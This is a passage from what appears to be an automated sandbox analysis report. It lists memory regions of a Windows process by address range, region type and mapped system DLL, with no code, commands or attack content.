	          end_va = 0x2ad21490fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002ad21310000"
	        filename = ""

Region:
	              id = 1909
	        start_va = 0x2ad214a0000
	          end_va = 0x2ad2289ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002ad214a0000"
	        filename = ""

Region:
	              id = 1910
	        start_va = 0x2ad20760000
	          end_va = 0x2ad20760fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad20760000"
	        filename = ""

Region:
	              id = 1911
	        start_va = 0x2ad20770000
	          end_va = 0x2ad20770fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad20770000"
	        filename = ""

Region:
	              id = 1912
	        start_va = 0x7ffc06700000
	          end_va = 0x7ffc0698dfff
	     entry_point = 0x7ffc06700000
	     region_type = mapped_file
	            name = "wininet.dll"
	        filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")

Region:
	              id = 1913
	        start_va = 0x7ffc14800000
	          end_va = 0x7ffc14942fff
	     entry_point = 0x7ffc14800000
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")

Region:
	              id = 1914
	        start_va = 0x7ffc123a0000
	          end_va = 0x7ffc12435fff
	     entry_point = 0x7ffc123a0000
	     region_type = mapped_file
	            name = "uxtheme.dll"
	        filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")

Region:
	              id = 1915
	        start_va = 0x2ad207c0000
	          end_va = 0x2ad207effff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad207c0000"
	        filename = ""

Region:
	              id = 1916
	        start_va = 0x7ffc16810000
	          end_va = 0x7ffc16969fff
	     entry_point = 0x7ffc16810000
	     region_type = mapped_file
	            name = "msctf.dll"
	        filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")

Region:
	              id = 1917
	        start_va = 0x2ad20780000
	          end_va = 0x2ad20780fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002ad20780000"
	        filename = ""

Region:
	              id = 1918
	        start_va = 0x2ad228a0000
	          end_va = 0x2ad2295bfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002ad228a0000"
	        filename = ""

Region:
	              id = 1919
	        start_va = 0x2ad20780000
	          end_va = 0x2ad20783fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002ad20780000"
	        filename = ""

Region:
	              id = 1920
	        start_va = 0x7ffc119f0000
	          end_va = 0x7ffc11a11fff
	     entry_point = 0x7ffc119f0000
	     region_type = mapped_file
	            name = "dwmapi.dll"
	        filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")

Region:
	              id = 1921
	        start_va = 0x2ad22960000
	          end_va = 0x2ad22a3cfff
	     entry_point = 0x2ad22960000
	     region_type = mapped_file
	            name = "rpcss.dll"
	        filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")

Region:
	              id = 1922
	        start_va = 0xd7ee080000
	          end_va = 0xd7ee0fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000d7ee080000"
	        filename = ""

Region:
	              id = 1923
	        start_va = 0xd7ee100000
	          end_va = 0xd7ee17ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000d7ee100000"
	        filename = ""

Region:
	              id = 1924
	        start_va = 0xd7ee180000
	          end_va = 0xd7ee1fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000d7ee180000"
	        filename = ""

Region:
	              id = 1925
	        start_va = 0xd7ee200000
	          end_va = 0xd7ee27ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000d7ee200000"
	        filename = ""

Region:
	              id = 1926
	        start_va = 0x7ffbf77c0000
	          end_va = 0x7ffbf77d2fff
	     entry_point = 0x7ffbf77c0000
	     region_type = mapped_file
	            name = "msoxmlmf.dll"
	        filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\MSOXMLMF.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\msoxmlmf.dll")

Region:
	              id = 1927
	        start_va = 0x7ffc05ea0000
	          end_va = 0x7ffc05eb5fff
	     entry_point = 0x7ffc05ea0000
	     region_type = mapped_file
	            name = "vcruntime140.dll"
	        filename = "\\Windows\\System32\\vcruntime140.dll" (normalized: "c:\\windows\\system32\\vcruntime140.dll")

Region:
	              id = 1928
	        start_va = 0x7ffc12bc0000
	          end_va = 0x7ffc12cb3fff
	     entry_point = 0x7ffc12bc0000
	     region_type = mapped_file
	            name = "ucrtbase.dll"
	        filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll")

Region:
	              id = 1929
	        start_va = 0x2ad207a0000
	          end_va = 0x2ad207a0fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad207a0000"
	        filename = ""

Region:
	              id = 1930
	        start_va = 0x2ad207c0000
	          end_va = 0x2ad207c0fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad207c0000"
	        filename = ""

Region:
	              id = 1931
	        start_va = 0x2ad207e0000
	          end_va = 0x2ad207effff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad207e0000"
	        filename = ""

Region:
	              id = 1932
	        start_va = 0x2ad22960000
	          end_va = 0x2ad22a5ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad22960000"
	        filename = ""

Region:
	              id = 1933
	        start_va = 0x7ffc06410000
	          end_va = 0x7ffc06423fff
	     entry_point = 0x7ffc06410000
	     region_type = mapped_file
	            name = "wbemsvc.dll"
	        filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")

Region:
	              id = 1934
	        start_va = 0x7ffc06430000
	          end_va = 0x7ffc06525fff
	     entry_point = 0x7ffc06430000
	     region_type = mapped_file
	            name = "fastprox.dll"
	        filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")

Region:
	              id = 1935
	        start_va = 0x2ad207f0000
	          end_va = 0x2ad2080ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002ad207f0000"
	        filename = ""

Region:
	              id = 1936
	        start_va = 0x2ad207f0000
	          end_va = 0x2ad2080ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002ad207f0000"
	        filename = ""

Region:
	              id = 1937
	        start_va = 0x2ad22a60000
	          end_va = 0x2ad22b5ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad22a60000"
	        filename = ""

Region:
	              id = 1938
	        start_va = 0x7ffc063e0000
	          end_va = 0x7ffc06404fff
	     entry_point = 0x7ffc063e0000
	     region_type = mapped_file
	            name = "wmiutils.dll"
	        filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll")

Region:
	              id = 1939
	        start_va = 0x7ffbf7780000
	          end_va = 0x7ffbf779bfff
	     entry_point = 0x7ffbf7780000
	     region_type = mapped_file
	            name = "wmi2xml.dll"
	        filename = "\\Windows\\System32\\wbem\\xml\\wmi2xml.dll" (normalized: "c:\\windows\\system32\\wbem\\xml\\wmi2xml.dll")

Region:
	              id = 1940
	        start_va = 0x2ad22b60000
	          end_va = 0x2ad22c5ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad22b60000"
	        filename = ""

Region:
	              id = 1941
	        start_va = 0x7ffc14a70000
	          end_va = 0x7ffc15fcefff
	     entry_point = 0x7ffc14a70000
	     region_type = mapped_file
	            name = "shell32.dll"
	        filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")

Region:
	              id = 1942
	        start_va = 0x2ad207d0000
	          end_va = 0x2ad207d0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002ad207d0000"
	        filename = ""

Region:
	              id = 1943
	        start_va = 0x2ad207f0000
	          end_va = 0x2ad207f0fff
	     entry_point = 0x2ad207f0000
	     region_type = mapped_file
	            name = "counters.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat")

Region:
	              id = 1944
	        start_va = 0x7ffc0b3b0000
	          end_va = 0x7ffc0b3c4fff
	     entry_point = 0x7ffc0b3b0000
	     region_type = mapped_file
	            name = "ondemandconnroutehelper.dll"
	        filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll")

Region:
	              id = 1945
	        start_va = 0x7ffc0f200000
	          end_va = 0x7ffc0f2c7fff
	     entry_point = 0x7ffc0f200000
	     region_type = mapped_file
	            name = "winhttp.dll"
	        filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll")

Region:
	              id = 1946
	        start_va = 0x2ad20800000
	          end_va = 0x2ad20800fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002ad20800000"
	        filename = ""

Region:
	              id = 1947
	        start_va = 0x7ffc16fa0000
	          end_va = 0x7ffc16fa7fff
	     entry_point = 0x7ffc16fa0000
	     region_type = mapped_file
	            name = "nsi.dll"
	        filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")

Region:
	              id = 1948
	        start_va = 0x7ffc12490000
	          end_va = 0x7ffc12539fff
	     entry_point = 0x7ffc12490000
	     region_type = mapped_file
	            name = "dnsapi.dll"
	        filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")

Region:
	              id = 1949
	        start_va = 0x7ffc0c430000
	          end_va = 0x7ffc0c43afff
	     entry_point = 0x7ffc0c430000
	     region_type = mapped_file
	            name = "winnsi.dll"
	        filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")

Region:
	              id = 1950
	        start_va = 0x7ffc132f0000
	          end_va = 0x7ffc1334bfff
	     entry_point = 0x7ffc132f0000
	     region_type = mapped_file
	            name = "mswsock.dll"
	        filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")

Region:
	              id = 1951
	        start_va = 0x2ad20810000
	          end_va = 0x2ad2081ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002ad20810000"
	        filename = ""

Region:
	              id = 1952
	        start_va = 0x2ad22c60000
	          end_va = 0x2ad22d5ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad22c60000"
	        filename = ""

Region:
	              id = 1953
	        start_va = 0x7ffc0c360000
	          end_va = 0x7ffc0c3c6fff
	     entry_point = 0x7ffc0c360000
	     region_type = mapped_file
	            name = "fwpuclnt.dll"
	        filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")

Region:
	              id = 1954
	        start_va = 0x7ffc0ad10000
	          end_va = 0x7ffc0ad19fff
	     entry_point = 0x7ffc0ad10000
	     region_type = mapped_file
	            name = "rasadhlp.dll"
	        filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll")

Region:
	              id = 1955
	        start_va = 0x2ad22d60000
	          end_va = 0x2ad2315afff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002ad22d60000"
	        filename = ""

Region:
	              id = 1956
	        start_va = 0x7ffc12f70000
	          end_va = 0x7ffc12fe9fff
	     entry_point = 0x7ffc12f70000
	     region_type = mapped_file
	            name = "schannel.dll"
	        filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll")

Region:
	              id = 1957
	        start_va = 0x7ffc13a90000
	          end_va = 0x7ffc13a9ffff
	     entry_point = 0x7ffc13a90000
	     region_type = mapped_file
	            name = "msasn1.dll"
	        filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")

Region:
	              id = 1958
	        start_va = 0x7ffc142c0000
	          end_va = 0x7ffc14486fff
	     entry_point = 0x7ffc142c0000
	     region_type = mapped_file
	            name = "crypt32.dll"
	        filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")

Region:
	              id = 1959
	        start_va = 0x2ad20820000
	          end_va = 0x2ad20821fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad20820000"
	        filename = ""

Region:
	              id = 1960
	        start_va = 0x7ffc03cc0000
	          end_va = 0x7ffc03cd3fff
	     entry_point = 0x7ffc03cc0000
	     region_type = mapped_file
	            name = "mskeyprotect.dll"
	        filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll")

Region:
	              id = 1961
	        start_va = 0x7ffc13550000
	          end_va = 0x7ffc13589fff
	     entry_point = 0x7ffc13550000
	     region_type = mapped_file
	            name = "ntasn1.dll"
	        filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll")

Region:
	              id = 1962
	        start_va = 0x7ffc13590000
	          end_va = 0x7ffc135b6fff
	     entry_point = 0x7ffc13590000
	     region_type = mapped_file
	            name = "ncrypt.dll"
	        filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll")

Region:
	              id = 1963
	        start_va = 0x7ffc13070000
	          end_va = 0x7ffc13079fff
	     entry_point = 0x7ffc13070000
	     region_type = mapped_file
	            name = "dpapi.dll"
	        filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll")

Region:
	              id = 1964
	        start_va = 0x7ffc13bf0000
	          end_va = 0x7ffc13c44fff
	     entry_point = 0x7ffc13bf0000
	     region_type = mapped_file
	            name = "wintrust.dll"
	        filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")

Region:
	              id = 1965
	        start_va = 0x7ffc133a0000
	          end_va = 0x7ffc133b6fff
	     entry_point = 0x7ffc133a0000
	     region_type = mapped_file
	            name = "cryptsp.dll"
	        filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")

Region:
	              id = 1966
	        start_va = 0x7ffc13030000
	          end_va = 0x7ffc13063fff
	     entry_point = 0x7ffc13030000
	     region_type = mapped_file
	            name = "rsaenh.dll"
	        filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")

Region:
	              id = 1967
	        start_va = 0xd7ee280000
	          end_va = 0xd7ee2fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000d7ee280000"
	        filename = ""

Region:
	              id = 1968
	        start_va = 0x7ffc03d40000
	          end_va = 0x7ffc03d5dfff
	     entry_point = 0x7ffc03d40000
	     region_type = mapped_file
	            name = "ncryptsslp.dll"
	        filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll")

Region:
	              id = 1969
	        start_va = 0x7ffc134c0000
	          end_va = 0x7ffc134cafff
	     entry_point = 0x7ffc134c0000
	     region_type = mapped_file
	            name = "cryptbase.dll"
	        filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")

Region:
	              id = 1970
	        start_va = 0x7ffc17330000
	          end_va = 0x7ffc1739efff
	     entry_point = 0x7ffc17330000
	     region_type = mapped_file
	            name = "coml2.dll"
	        filename = "\\Windows\\System32\\coml2.dll" (normalized: "c:\\windows\\system32\\coml2.dll")

Region:
	              id = 1971
	        start_va = 0x7ffbf6140000
	          end_va = 0x7ffbf6207fff
	     entry_point = 0x7ffbf6140000
	     region_type = mapped_file
	            name = "jscript.dll"
	        filename = "\\Windows\\System32\\jscript.dll" (normalized: "c:\\windows\\system32\\jscript.dll")

Region:
	              id = 1972
	        start_va = 0x7ffbf68c0000
	          end_va = 0x7ffbf68cffff
	     entry_point = 0x7ffbf68c0000
	     region_type = mapped_file
	            name = "amsi.dll"
	        filename = "\\Windows\\System32\\amsi.dll" (normalized: "c:\\windows\\system32\\amsi.dll")

Region:
	              id = 1973
	        start_va = 0x7ffbf8ae0000
	          end_va = 0x7ffbf8b47fff
	     entry_point = 0x7ffbf8ae0000
	     region_type = mapped_file
	            name = "mscoree.dll"
	        filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll")

Region:
	              id = 1974
	        start_va = 0x2ad20820000
	          end_va = 0x2ad20826fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad20820000"
	        filename = ""

Region:
	              id = 1975
	        start_va = 0x2ad23250000
	          end_va = 0x2ad2325ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad23250000"
	        filename = ""

Region:
	              id = 1976
	        start_va = 0x7ffbf8a40000
	          end_va = 0x7ffbf8ad7fff
	     entry_point = 0x7ffbf8a40000
	     region_type = mapped_file
	            name = "mscoreei.dll"
	        filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll")

Region:
	              id = 1977
	        start_va = 0x7ffc08000000
	          end_va = 0x7ffc08009fff
	     entry_point = 0x7ffc08000000
	     region_type = mapped_file
	            name = "version.dll"
	        filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")

Region:
	              id = 1978
	        start_va = 0x5cfe0000
	          end_va = 0x5d0a8fff
	     entry_point = 0x5cfe0000
	     region_type = mapped_file
	            name = "msvcr80.dll"
	        filename = "\\Windows\\WinSxS\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9193_none_88e4514b2faac6c7\\msvcr80.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9193_none_88e4514b2faac6c7\\msvcr80.dll")

Region:
	              id = 1979
	        start_va = 0x2ad20850000
	          end_va = 0x2ad20850fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002ad20850000"
	        filename = ""

Region:
	              id = 1980
	        start_va = 0x2ad23230000
	          end_va = 0x2ad2323ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad23230000"
	        filename = ""

Region:
	              id = 1981
	        start_va = 0x7ffbf57a0000
	          end_va = 0x7ffbf613ffff
	     entry_point = 0x7ffbf57a0000
	     region_type = mapped_file
	            name = "mscorwks.dll"
	        filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorwks.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorwks.dll")

Region:
	              id = 1982
	        start_va = 0x20000
	          end_va = 0x3ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000020000"
	        filename = ""

Region:
	              id = 1983
	        start_va = 0x2ad20860000
	          end_va = 0x2ad20866fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad20860000"
	        filename = ""

Region:
	              id = 1984
	        start_va = 0x2ad20ca0000
	          end_va = 0x2ad20ca2fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002ad20ca0000"
	        filename = ""

Region:
	              id = 1985
	        start_va = 0x2ad20cb0000
	          end_va = 0x2ad20cb0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002ad20cb0000"
	        filename = ""

Region:
	              id = 1986
	        start_va = 0x2ad20d10000
	          end_va = 0x2ad20d1ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad20d10000"
	        filename = ""

Region:
	              id = 1987
	        start_va = 0xd7ee300000
	          end_va = 0xd7ee37ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000d7ee300000"
	        filename = ""

Region:
	              id = 1988
	        start_va = 0x7ffb96030000
	          end_va = 0x7ffb9603ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb96030000"
	        filename = ""

Region:
	              id = 1989
	        start_va = 0x7ffb96040000
	          end_va = 0x7ffb9604ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb96040000"
	        filename = ""

Region:
	              id = 1990
	        start_va = 0x7ffb96050000
	          end_va = 0x7ffb960effff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb96050000"
	        filename = ""

Region:
	              id = 1991
	        start_va = 0x7ffb960f0000
	          end_va = 0x7ffb960fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb960f0000"
	        filename = ""

Region:
	              id = 1992
	        start_va = 0x7ffb96100000
	          end_va = 0x7ffb9616ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb96100000"
	        filename = ""

Region:
	              id = 1993
	        start_va = 0xd7ee380000
	          end_va = 0xd7ee3fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000d7ee380000"
	        filename = ""

Region:
	              id = 1994
	        start_va = 0x2ad23260000
	          end_va = 0x2ad3b25ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad23260000"
	        filename = ""

Region:
	              id = 1995
	        start_va = 0x2ad3b260000
	          end_va = 0x2ad3b92ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad3b260000"
	        filename = ""

Region:
	              id = 1996
	        start_va = 0x2ad3b930000
	          end_va = 0x2ad3ba3afff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad3b930000"
	        filename = ""

Region:
	              id = 1997
	        start_va = 0x7ffbf48c0000
	          end_va = 0x7ffbf579dfff
	     entry_point = 0x7ffbf48c0000
	     region_type = mapped_file
	            name = "mscorlib.ni.dll"
	        filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\mscorlib\\00976757a0c560c95932437bdc9d474f\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\mscorlib\\00976757a0c560c95932437bdc9d474f\\mscorlib.ni.dll")

Region:
	              id = 1998
	        start_va = 0x2ad20cc0000
	          end_va = 0x2ad20ccffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad20cc0000"
	        filename = ""

Region:
	              id = 1999
	        start_va = 0x7ff66e1f0000
	          end_va = 0x7ff66e1fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff66e1f0000"
	        filename = ""

Region:
	              id = 2000
	        start_va = 0x7ff66e200000
	          end_va = 0x7ff66e28ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff66e200000"
	        filename = ""

Region:
	              id = 2001
	        start_va = 0x7ffc138b0000
	          end_va = 0x7ffc13948fff
	     entry_point = 0x7ffc138b0000
	     region_type = mapped_file
	            name = "sxs.dll"
	        filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll")

Region:
	              id = 2002
	        start_va = 0x2ad20ce0000
	          end_va = 0x2ad20ceffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad20ce0000"
	        filename = ""

Region:
	              id = 2003
	        start_va = 0x7ffb96170000
	          end_va = 0x7ffb9617ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb96170000"
	        filename = ""

Region:
	              id = 2004
	        start_va = 0x7ffbf37e0000
	          end_va = 0x7ffbf3e88fff
	     entry_point = 0x7ffbf37e0000
	     region_type = mapped_file
	            name = "system.xml.ni.dll"
	        filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Xml\\b9686994a3c564bc9709f37a974d0ab1\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.xml\\b9686994a3c564bc9709f37a974d0ab1\\system.xml.ni.dll")

Region:
	              id = 2005
	        start_va = 0x7ffbf3e90000
	          end_va = 0x7ffbf48bffff
	     entry_point = 0x7ffbf3e90000
	     region_type = mapped_file
	            name = "system.ni.dll"
	        filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System\\21161602d61e696b127fa8412fba51a5\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system\\21161602d61e696b127fa8412fba51a5\\system.ni.dll")

Region:
	              id = 2006
	        start_va = 0x2ad20cf0000
	          end_va = 0x2ad20cf7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002ad20cf0000"
	        filename = ""

Region:
	              id = 2007
	        start_va = 0x2ad20d00000
	          end_va = 0x2ad20d00fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002ad20d00000"
	        filename = ""

Region:
	              id = 2008
	        start_va = 0x7ffb96180000
	          end_va = 0x7ffb9618ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb96180000"
	        filename = ""

Region:
	              id = 2009
	        start_va = 0x7ffbf3650000
	          end_va = 0x7ffbf37d2fff
	     entry_point = 0x7ffbf3650000
	     region_type = mapped_file
	            name = "mscorjit.dll"
	        filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorjit.dll")

Region:
	              id = 2010
	        start_va = 0x2ad20d20000
	          end_va = 0x2ad20d2ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad20d20000"
	        filename = ""

Region:
	              id = 2011
	        start_va = 0x2ad20d30000
	          end_va = 0x2ad20d3ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad20d30000"
	        filename = ""

Region:
	              id = 2012
	        start_va = 0x2ad20d40000
	          end_va = 0x2ad20d4ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad20d40000"
	        filename = ""

Region:
	              id = 2013
	        start_va = 0x2ad20d50000
	          end_va = 0x2ad20d5ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad20d50000"
	        filename = ""

Region:
	              id = 2014
	        start_va = 0x7ffb96190000
	          end_va = 0x7ffb961cffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb96190000"
	        filename = ""

Region:
	              id = 2015
	        start_va = 0x2ad20d60000
	          end_va = 0x2ad20d6ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad20d60000"
	        filename = ""

Region:
	              id = 2016
	        start_va = 0x2ad23160000
	          end_va = 0x2ad2316ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad23160000"
	        filename = ""

Region:
	              id = 2017
	        start_va = 0x2ad23170000
	          end_va = 0x2ad2317ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad23170000"
	        filename = ""

Region:
	              id = 2018
	        start_va = 0x2ad23180000
	          end_va = 0x2ad2318ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad23180000"
	        filename = ""

Region:
	              id = 2019
	        start_va = 0x7ffbf2af0000
	          end_va = 0x7ffbf364cfff
	     entry_point = 0x7ffbf2af0000
	     region_type = mapped_file
	            name = "system.management.automation.ni.dll"
	        filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Management.A#\\f39bedd1fb8c063e389d9599e994a7bb\\System.Management.Automation.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.management.a#\\f39bedd1fb8c063e389d9599e994a7bb\\system.management.automation.ni.dll")

Region:
	              id = 2020
	        start_va = 0x2ad23190000
	          end_va = 0x2ad23194fff
	     entry_point = 0x2ad23190000
	     region_type = mapped_file
	            name = "sorttbls.nlp"
	        filename = "\\Windows\\assembly\\GAC_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp" (normalized: "c:\\windows\\assembly\\gac_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp")

Region:
	              id = 2021
	        start_va = 0x2ad231a0000
	          end_va = 0x2ad231e0fff
	     entry_point = 0x2ad231a0000
	     region_type = mapped_file
	            name = "sortkey.nlp"
	        filename = "\\Windows\\assembly\\GAC_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp" (normalized: "c:\\windows\\assembly\\gac_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp")

Region:
	              id = 2022
	        start_va = 0x2ad231f0000
	          end_va = 0x2ad231f2fff
	     entry_point = 0x2ad231f0000
	     region_type = mapped_file
	            name = "l_intl.nls"
	        filename = "\\Windows\\System32\\l_intl.nls" (normalized: "c:\\windows\\system32\\l_intl.nls")

Region:
	              id = 2023
	        start_va = 0x2ad23200000
	          end_va = 0x2ad23200fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002ad23200000"
	        filename = ""

Region:
	              id = 2024
	        start_va = 0x7ffbf6900000
	          end_va = 0x7ffbf6909fff
	     entry_point = 0x7ffbf6900000
	     region_type = mapped_file
	            name = "culture.dll"
	        filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Culture.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\culture.dll")

Region:
	              id = 2025
	        start_va = 0x5ccd0000
	          end_va = 0x5cfdbfff
	     entry_point = 0x5ccd0000
	     region_type = mapped_file
	            name = "system.data.dll"
